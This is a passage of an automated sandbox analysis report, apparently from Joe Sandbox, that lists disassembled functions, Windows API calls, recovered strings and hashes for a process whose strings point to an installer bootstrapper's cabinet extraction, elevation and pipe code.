                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,009B4028,00000001,feclient.dll,?,00000000,?,?,?,009A4B12,?), ref: 009A4294
                                                                                                                • GetLastError.KERNEL32(?,?,009B4028,00000001,feclient.dll,?,00000000,?,?,?,009A4B12,?,?,009EB488,?,00000001), ref: 009A429E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectoryErrorLast
                                                                                                                • String ID: crypt32.dll$dirutil.cpp
                                                                                                                • API String ID: 152501406-1104880720
                                                                                                                • Opcode ID: 67e0e9ed84475af9241f3531a6b135aa7c7648c5dd344339eeea87b94ef04db9
                                                                                                                • Instruction ID: 7cab4c76c46643b1f4d7bf92625e823ecc28a91ac0d0c84f0776413f3ab205eb
                                                                                                                • Opcode Fuzzy Hash: 67e0e9ed84475af9241f3531a6b135aa7c7648c5dd344339eeea87b94ef04db9
                                                                                                                • Instruction Fuzzy Hash: 86119A77E41637AB97215ADA4C8475BBA5CEF86761B110165FE10EB250E760DC0096E0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • Unexpected call to CabWrite()., xrefs: 009C0BC1
                                                                                                                • cabextract.cpp, xrefs: 009C0C2B
                                                                                                                • Failed to write during cabinet extraction., xrefs: 009C0C35
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                • API String ID: 1970631241-3111339858
                                                                                                                • Opcode ID: d0ffd6f811fa34e57f32f8c861e9d015f60e703260d1e09faf5008a9e6e36090
                                                                                                                • Instruction ID: 4a69f32194a881978523707955c0ed5a6dd914d16ad925016d260740514f631c
                                                                                                                • Opcode Fuzzy Hash: d0ffd6f811fa34e57f32f8c861e9d015f60e703260d1e09faf5008a9e6e36090
                                                                                                                • Instruction Fuzzy Hash: 87210176944209EBCB10CF9CC881E6A37A8FFC8324F214159FE18CB242E631ED00DB61
                                                                                                                APIs
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009A9AFB
                                                                                                                • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,00000000,?,009AA8B4,00000100,000002C0,000002C0,00000100), ref: 009A9B10
                                                                                                                • GetLastError.KERNEL32(?,009AA8B4,00000100,000002C0,000002C0,00000100), ref: 009A9B1B
                                                                                                                Strings
                                                                                                                • Failed to format variable string., xrefs: 009A9B06
                                                                                                                • Failed to set variable., xrefs: 009A9B7A
                                                                                                                • Failed while searching directory search: %ls, for path: %ls, xrefs: 009A9B54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesErrorFileLastOpen@16
                                                                                                                • String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                • API String ID: 1811509786-402580132
                                                                                                                • Opcode ID: b2e65385c7f1929ed9f7d66587c3d9b672826f23a77431785a75c99c70f0414f
                                                                                                                • Instruction ID: a228c232ae3160cdc6d255314302ae69199349c5c35c3a6ad5ae25f950c70caa
                                                                                                                • Opcode Fuzzy Hash: b2e65385c7f1929ed9f7d66587c3d9b672826f23a77431785a75c99c70f0414f
                                                                                                                • Instruction Fuzzy Hash: 66112932940575FBDB221A99AC82F6EF658FF82374F100311FE1066190C7659D50A2E0
                                                                                                                APIs
                                                                                                                • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 009C0CC4
                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009C0CD6
                                                                                                                • SetFileTime.KERNEL32(?,?,?,?), ref: 009C0CE9
                                                                                                                • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,009C08B1,?,?), ref: 009C0CF8
                                                                                                                Strings
                                                                                                                • cabextract.cpp, xrefs: 009C0C93
                                                                                                                • Invalid operation for this state., xrefs: 009C0C9D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$File$CloseDateHandleLocal
                                                                                                                • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                • API String ID: 609741386-1751360545
                                                                                                                • Opcode ID: 9c798678a483f21a24e526c487fef862e9a0c0c725d060fd4a10fc5b4d6ca2ed
                                                                                                                • Instruction ID: b41869fbc07f9d0f32acc1044b3fec2e44c30dfb7ddad4368637e8ad77417140
                                                                                                                • Opcode Fuzzy Hash: 9c798678a483f21a24e526c487fef862e9a0c0c725d060fd4a10fc5b4d6ca2ed
                                                                                                                • Instruction Fuzzy Hash: C4210871C1121AEB8B109FA8CC49EBA7BBCFF84720B50421AF565D61D0D374ED51CB91
                                                                                                                APIs
                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,crypt32.dll,00000000,00000000,00000000,?,009B539D), ref: 009B4AC3
                                                                                                                Strings
                                                                                                                • Failed to allocate message to write., xrefs: 009B4AA2
                                                                                                                • Failed to write message type to pipe., xrefs: 009B4B05
                                                                                                                • pipe.cpp, xrefs: 009B4AFB
                                                                                                                • crypt32.dll, xrefs: 009B4A7D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite
                                                                                                                • String ID: Failed to allocate message to write.$Failed to write message type to pipe.$crypt32.dll$pipe.cpp
                                                                                                                • API String ID: 3934441357-606776022
                                                                                                                • Opcode ID: 08439a575eb85f8c3c1d2388e00b72620b8b05414c60c6ca38d6c7806dcf0c25
                                                                                                                • Instruction ID: 996b9929b9dd8f4e84124114ad0ce0524d392a38ae978cf8c2c7bfdf5e6b1add
                                                                                                                • Opcode Fuzzy Hash: 08439a575eb85f8c3c1d2388e00b72620b8b05414c60c6ca38d6c7806dcf0c25
                                                                                                                • Instruction Fuzzy Hash: 35119D32940129BBCB219F85DE05BEF7BA8EB80760F114065FA00B6252D730AE50E7A1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • _memcpy_s.LIBCMT ref: 009B4693
                                                                                                                • _memcpy_s.LIBCMT ref: 009B46A6
                                                                                                                • _memcpy_s.LIBCMT ref: 009B46C1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memcpy_s$Heap$AllocateProcess
                                                                                                                • String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
                                                                                                                • API String ID: 886498622-766083570
                                                                                                                • Opcode ID: 01fe06d6ee9ed00748fa3b978360f6ba6a5c25e9588465c042973c8b467ab07a
                                                                                                                • Instruction ID: d7a10c8dc8ab970ae49a761104dee2db7d531cea1739e7d3eab4df27d52dbef7
                                                                                                                • Opcode Fuzzy Hash: 01fe06d6ee9ed00748fa3b978360f6ba6a5c25e9588465c042973c8b467ab07a
                                                                                                                • Instruction Fuzzy Hash: F911A0B210030EABDB01EE94CC82DEBB3ADEF85B14B004526FA10DB142D775DA54C7E0
                                                                                                                APIs
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 009E3CC0
                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 009E3CCA
                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000), ref: 009E3CFD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseErrorExecuteHandleLastShell
                                                                                                                • String ID: <$PDu$shelutil.cpp
                                                                                                                • API String ID: 3023784893-2418939910
                                                                                                                • Opcode ID: cb1555d8782e2babb76e04a5eb5958159d2e785f8b363a92db85334645bcf35f
                                                                                                                • Instruction ID: deadb36dac9df9142d1fdc20be7771af1bf18b02bcca554246523a8dc752d8e6
                                                                                                                • Opcode Fuzzy Hash: cb1555d8782e2babb76e04a5eb5958159d2e785f8b363a92db85334645bcf35f
                                                                                                                • Instruction Fuzzy Hash: 7011C775E01259ABCB11DFAAD949A9E7BF8BB08750F108115FD15E7340E734DE10CBA4
                                                                                                                APIs
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009A9AC4
                                                                                                                Strings
                                                                                                                • Failed to copy condition string from BSTR, xrefs: 009A9AAE
                                                                                                                • Failed to get Condition inner text., xrefs: 009A9A94
                                                                                                                • `<u, xrefs: 009A9AC4
                                                                                                                • Failed to select condition node., xrefs: 009A9A7B
                                                                                                                • Condition, xrefs: 009A9A5F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeString
                                                                                                                • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$`<u
                                                                                                                • API String ID: 3341692771-266405526
                                                                                                                • Opcode ID: ad790db794317f42dcf6a1c45f1095997c822764ea8d1f3edfbd260aa686e6f8
                                                                                                                • Instruction ID: 5442c622922df2dbc4982a0970c6261854e49ef2d77df24a2a62859c4b52ed73
                                                                                                                • Opcode Fuzzy Hash: ad790db794317f42dcf6a1c45f1095997c822764ea8d1f3edfbd260aa686e6f8
                                                                                                                • Instruction Fuzzy Hash: E211C432906268BBCB129B95CD0AFADBB68FF41765F208256FC01BB150DBB59E40D6C0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                • API String ID: 0-1718035505
                                                                                                                • Opcode ID: 08751a974618ae64db7c4219907a87c8cedfd31e1c70322efc17583694e852fc
                                                                                                                • Instruction ID: 470f24909430fa5d1c39b0caa6d4f2b3a76c0dc1ea62fb069a953bdfbeb44b1e
                                                                                                                • Opcode Fuzzy Hash: 08751a974618ae64db7c4219907a87c8cedfd31e1c70322efc17583694e852fc
                                                                                                                • Instruction Fuzzy Hash: DE01F9716762E75B8F239E676CC06D7238C6B067923100977D521D7140DB22CC5AE6A0
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,009A5EB2,00000000), ref: 009E0AE0
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 009E0AE7
                                                                                                                • GetLastError.KERNEL32(?,?,?,009A5EB2,00000000), ref: 009E0AFE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorHandleLastModuleProc
                                                                                                                • String ID: IsWow64Process$kernel32$procutil.cpp
                                                                                                                • API String ID: 4275029093-1586155540
                                                                                                                • Opcode ID: 030da1bbfc9eff2d526513ff7d062b50d05c130752138a10a1086048d210017f
                                                                                                                • Instruction ID: 383a8e4e8962a454a419a4324f2580f17d17572dbb09a9729361c741b25edf23
                                                                                                                • Opcode Fuzzy Hash: 030da1bbfc9eff2d526513ff7d062b50d05c130752138a10a1086048d210017f
                                                                                                                • Instruction Fuzzy Hash: 53F0F432A04279A78B229B969C4995BBA68BB44B51B050104BD04AB280EBB0ED4097D0
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009D3479,009D3479,?,?,?,009DA45C,00000001,00000001,ECE85006), ref: 009DA265
                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009DA45C,00000001,00000001,ECE85006,?,?,?), ref: 009DA2EB
                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ECE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009DA3E5
                                                                                                                • __freea.LIBCMT ref: 009DA3F2
                                                                                                                  • Part of subcall function 009D521A: RtlAllocateHeap.NTDLL(00000000,?,?,?,009D1F87,?,0000015D,?,?,?,?,009D33E0,000000FF,00000000,?,?), ref: 009D524C
                                                                                                                • __freea.LIBCMT ref: 009DA3FB
                                                                                                                • __freea.LIBCMT ref: 009DA420
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1414292761-0
                                                                                                                • Opcode ID: 0acb03d9878a2db48ba93c952092786ed0dd5c1c7dfdea55bf8f0d0eae4c5620
                                                                                                                • Instruction ID: c42889cb6f471a512e4428182df2a27febd60b0b41858008bbcc1520c632af24
                                                                                                                • Opcode Fuzzy Hash: 0acb03d9878a2db48ba93c952092786ed0dd5c1c7dfdea55bf8f0d0eae4c5620
                                                                                                                • Instruction Fuzzy Hash: AC512472690216AFDB258F64CC81FBFB7AEEB84710F15862AFD14D6240EB34DCA0C651
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(000007D0,00000000,00000000), ref: 009B8D18
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
                                                                                                                • API String ID: 3472027048-398165853
                                                                                                                • Opcode ID: b7f524cf8d52f24d28361b458d8aea829f831d4a2ee1d8e7771847d9741f9a83
                                                                                                                • Instruction ID: 3da944d371d35a98dee70af7de1de01325f2aecda3ae88863149e6e2f9fac8d8
                                                                                                                • Opcode Fuzzy Hash: b7f524cf8d52f24d28361b458d8aea829f831d4a2ee1d8e7771847d9741f9a83
                                                                                                                • Instruction Fuzzy Hash: BC31C572A40619BBDB22A6648E46FFF626CDFE8730F114026FE00F62D1DA749D00D7A1
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,00000082,?,?), ref: 009BE985
                                                                                                                • SetWindowLongW.USER32(?,000000EB,00000000), ref: 009BE994
                                                                                                                • SetWindowLongW.USER32(?,000000EB,?), ref: 009BE9A8
                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 009BE9B8
                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 009BE9D2
                                                                                                                • PostQuitMessage.USER32(00000000), ref: 009BEA31
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                • String ID:
                                                                                                                • API String ID: 3812958022-0
                                                                                                                • Opcode ID: 40a2fd191d86a3b290d4976798209c0d9fa6a95aac9135c25c9713e5b97394e5
                                                                                                                • Instruction ID: 97580292e81558224758f92b713faf748d15a0e734c2ed9435ab57a48c3f0ba6
                                                                                                                • Opcode Fuzzy Hash: 40a2fd191d86a3b290d4976798209c0d9fa6a95aac9135c25c9713e5b97394e5
                                                                                                                • Instruction Fuzzy Hash: F7219075104148BFDB119F68DD89EEA3B6DFF85320F148618F90A9A1A4C731DD10EB90
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • elevation.cpp, xrefs: 009BC9B8
                                                                                                                • Unexpected elevated message sent to child process, msg: %u, xrefs: 009BC9C4
                                                                                                                • Failed to save state., xrefs: 009BC891
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleMutexRelease
                                                                                                                • String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
                                                                                                                • API String ID: 4207627910-1576875097
                                                                                                                • Opcode ID: 57b9c44bd64015878c0f9b29fff4ab38c457515ae541c254d073fdc313d215f3
                                                                                                                • Instruction ID: 0511a56396a3cd22bf04f863883736fe3cc99a1043c41f06f00f6c7831ee98d8
                                                                                                                • Opcode Fuzzy Hash: 57b9c44bd64015878c0f9b29fff4ab38c457515ae541c254d073fdc313d215f3
                                                                                                                • Instruction Fuzzy Hash: FE61D67A100504FFDF225F84CE41DA5BBB2FF487247158959FAA95A632C732E821EF41
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E7C74
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E7C7F
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E7C8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeString$Heap$AllocateProcess
                                                                                                                • String ID: `<u$atomutil.cpp
                                                                                                                • API String ID: 2724874077-4051019476
                                                                                                                • Opcode ID: f18c7d3eb3ecacc7c6b12d202c240032d8b7836e50b1c6394ea9b3da7da63afe
                                                                                                                • Instruction ID: 35973f8e0bba299a270b802f287077c15ce2e29d0c2f53f6aa4198b39e2f9895
                                                                                                                • Opcode Fuzzy Hash: f18c7d3eb3ecacc7c6b12d202c240032d8b7836e50b1c6394ea9b3da7da63afe
                                                                                                                • Instruction Fuzzy Hash: 93518F7190426AAFDB22DBA5C844FAEF7BCAF44710F254194E945AB250DB71EE00CBE1
                                                                                                                APIs
                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 009E123F
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,009B70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 009E1276
                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 009E136E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
